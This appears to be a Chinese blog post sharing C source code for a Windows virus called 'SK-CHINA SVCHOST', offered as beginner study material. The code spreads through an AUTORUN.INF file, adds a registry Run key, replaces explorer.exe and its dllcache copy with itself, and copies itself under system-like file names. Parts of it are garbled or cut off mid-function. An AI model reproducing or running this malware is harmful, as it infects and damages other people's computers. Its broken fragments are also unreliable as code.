入门级的病毒源码[VC++]

一朋友发给我,其实需要一块块的啃,啃完了就不难理解

 

/* SK-CHINA SVCHOST virus WRITE BY S.K Compiler: DEV-CPP 4.9.9.2 */ /* SVCHOST.C */ /* SVCHOST.EXE */ /* SVCHOST.COM */ #include /*标准输入输出*/ #include /*字符串操作*/ #include /*其它函数*/ #include /*进程控制*/ #include /*目录函数*/ #define SVCHOST_NUM 6 /*关键位置病毒复制数量*/ #define RUBBISH_NUM 5 /*垃圾文件数量*/ #define REMOVE_NUM 5 /*删除文件数*/ /*====================================================================*/ /* 文件AUTORUN.INF内容: 1.自动运行SVCHOST.com 2.覆盖默认打开命令,使用病毒体作为新的打开方式 3.覆盖默认资源管理器命令,使病毒体作为新的命令方式 */ char *autorun={"[AutoRun]/nopen=/"SVCHOST.com /s/"/nshell//open=打开(&O)/nshell//open//Command=/"SVCHOST.com /s/"/nshell//explore=资源管理器(&X)/nshell//explore//Command=/"SVCHOST.com /s/""}; /*=====================================================================*/ /* 添加注册表项: 1.自动运行生成病毒体C:/windows/wjview32.com */ char *regadd={"REGEDIT4/n/n[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]/n/"wjview32/"=/"C:windowswjview32.com /s/""}; /*=====================================================================*/ /* 函数:复制文件 复制源:infile 目的地:outfile 成功返回0,失败返回1 */ int copy(char *infile,char *outfile) { FILE *input,*output; char temp; if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen(outfile,"wb"))!=NULL)) { while(!feof(input)) { fread(&temp,1,1,input); fwrite(&temp,1,1,output); } fclose(input); fclose(output); return 0; } else return 1; } /*=====================================================================*/ /* 函数:通过explorer自动运行 成功返回0,失败返回1,2 */ int autorun_explorer() { FILE *input; if((input=fopen("c://windows//system//explorer.exe","rb"))!=NULL) { fclose(input); remove("c://windows//$temp$"); remove("c://windows//system32//dllcache//$temp$"); return 1; } copy("c://windows//explorer.exe","c://windows//system//explorer.exe"); rename("c://windows//explorer.exe","c://windows//$temp$"); rename("c://windows//system32//dllcache//explorer.exe","c://windows//system32//dllcache//$temp$"); if(copy("SVCHOST.com","c://windows//explorer.exe")==0 && copy("SVCHOST.com","c://windows//system32//dllcache//explorer.exe")==0) return 0; else return 2; } /*=====================================================================*/ /* 函数:添加注册表项 成功返回0,失败返回1 */ int add_reg() { FILE *output; if((output=fopen("$$$$$","w"))!=NULL) { fprintf(output,regadd); fclose(output); spawnl(1,"c://windows//regedit.exe"," /s $$$$$",NULL); } } /*=====================================================================*/ /* 函数:复制病毒 + Autorun.inf自动运行 */ void copy_virus() { int i,k; FILE *input,*output; char *files_svchost[SVCHOST_NUM]={"svchost.com","c://windows//wjview32.com","c://windows//system//MSMOUSE.DLL","c://windows//system32//cmdsys.sys","c://windows//system32//mstsc32.exe","c://windows//explorer.exe"}; char temp[2][20]={"c://svchost.com","c://autorun.inf"}; for(i=0;i1) if(strcmp(argv[1],"/s")==0) goto next1; autorun_explorer(); spawnl(1,"c://windows//system//explorer.exe",NULL); next1: add_reg(); copy_virus(); make_rubbish(); /* remove_files(); */ spawnl(1,"c://windows//system32//mstsc32.exe"," /s",NULL); return 0; }

你可能感兴趣的:(C,VC/MFC,vc++,output,input,null,file,c)